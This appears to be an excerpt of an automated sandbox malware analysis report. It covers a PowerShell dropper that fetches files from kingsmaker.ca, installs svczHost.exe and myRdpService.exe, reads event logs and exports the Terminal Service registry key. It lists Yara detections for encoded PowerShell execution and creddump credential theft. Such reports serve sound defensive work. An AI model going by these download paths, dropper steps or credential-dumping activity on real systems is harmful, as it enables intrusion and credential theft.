Source: powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000005.00000002.3057536830.0000015B56806000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0057F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: svczHost.exe, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
Source: powershell.exe, 00000001.00000002.3090409708.000001C820B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B55331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0057F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000005.00000002.3057536830.0000015B567AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D3627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000005.00000002.3057536830.0000015B56806000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: myRdpService.exe	String found in binary or memory: http://www.gstatic.com/generate_204
Source: svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204y
Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: powershell.exe, 00000009.00000002.3927729822.000001BD10310000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000010.00000002.4408300872.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: svczHost.exe, myRdpService.exe	String found in binary or memory: https://aka.ms/nativeaot-c
Source: myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: powershell.exe, 00000001.00000002.3090409708.000001C820B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B55331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.3076016059.0000015B6D570000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelpXz
Source: powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/MartinKuschnik/WmiLight
Source: powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D3627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000009.00000002.3927729822.000001BD10310000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4408300872.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: https://github.com/dotnet/runtime
Source: powershell.exe, 00000005.00000002.3057536830.0000015B56186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5664D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B558EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD019FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD003D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca
Source: powershell.exe, 00000001.00000002.3166238726.000001C838D32000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3078261639.0000015B6DCC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/
Source: powershell.exe, 00000001.00000002.3090409708.000001C8224F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3090409708.000001C821C79000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad5
Source: powershell.exe, 00000001.00000002.3090409708.000001C821104000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde650
Source: powershell.exe, 00000001.00000002.3090409708.000001C82122B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3090409708.000001C822CAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b6043
Source: powershell.exe, 00000009.00000002.3329091603.000001BD0040E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd7
Source: powershell.exe, 00000001.00000002.3090409708.000001C8211BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7ad
Source: svczHost.exe, 00000010.00000002.4401647954.00000252B682A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/StaticFile/RdpService/79
Source: svczHost.exe, 00000010.00000002.4401647954.00000252B682A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/StaticFile/RdpService/79h
Source: powershell.exe, 00000001.00000002.3090409708.000001C8211BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e7
Source: powershell.exe, 00000009.00000002.3329091603.000001BD0040E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa667424
Source: powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db11
Source: powershell.exe, 00000001.00000002.3090409708.000001C821104000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729
Source: powershell.exe, 00000009.00000002.3329091603.000001BD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a
Source: powershell.exe, 00000001.00000002.3090409708.000001C822523000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/c9af
Source: powershell.exe, 00000001.00000002.3090409708.000001C82122B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/c9af4eb65b32cc5a1a04364bb04718580813a988e08eb74585229c2e772e2187549fdd22
Source: powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb
Source: powershell.exe, 00000001.00000002.3157492838.000001C830BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3071558533.0000015B653A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.3057536830.0000015B567AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.30:49761 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\myRdpService
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\RdpService

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_5936.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 41.2.myRdpService.exe.7ff63b7a0000.0.unpack, type: UNPACKEDPE	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
Source: 00000029.00000002.4404534772.00007FF63BCA6000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
Source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: svczHost.exe PID: 9708, type: MEMORYSTR	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
Source: Process Memory Space: myRdpService.exe PID: 5496, type: MEMORYSTR	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\svczHost.exe

Jump to dropped file

Uses regedit.exe to modify the Windows registry

Source: C:\Windows\Temp\myRdpService.exe

Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\file

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFC454FA082	1_2_00007FFC454FA082
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFC454F92D6	1_2_00007FFC454F92D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFC454E4E6A	5_2_00007FFC454E4E6A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFC454E126A	5_2_00007FFC454E126A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFC455B39AF	9_2_00007FFC455B39AF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFC455B24F8	9_2_00007FFC455B24F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFC454F8552	20_2_00007FFC454F8552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFC454F77A6	20_2_00007FFC454F77A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FFC454FBC51	24_2_00007FFC454FBC51
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 47_2_00007FFC454F0E85	47_2_00007FFC454F0E85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 47_2_00007FFC454F0F09	47_2_00007FFC454F0F09

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\myRdpService.exe 6D42E3ACF08D81CC6B47693E0A38B22A59B15BB904AEAA914775356CF531FC90

Source: svczHost.exe.9.dr

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3675
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3628
Source: C:\Windows\Temp\svczHost.exe	Process created: Commandline size = 2904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3675	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3628	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: Commandline size = 2904

Source: amsi64_5936.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 41.2.myRdpService.exe.7ff63b7a0000.0.unpack, type: UNPACKEDPE	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
Source: 00000029.00000002.4404534772.00007FF63BCA6000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
Source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: svczHost.exe PID: 9708, type: MEMORYSTR	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
Source: Process Memory Space: myRdpService.exe PID: 5496, type: MEMORYSTR	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump

Source: powershell.exe, 00000001.00000002.3174733348.000001C83946D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CMD;.VBS;.VBP

Source: classification engine

Classification label: mal100.troj.expl.evad.winPS1@86/146@3/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9864:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9468:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:10040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7208:120:WilError_03
Source: C:\Windows\Temp\myRdpService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2840:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:10040:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7676:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9512:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2896:304:WilStaging_02
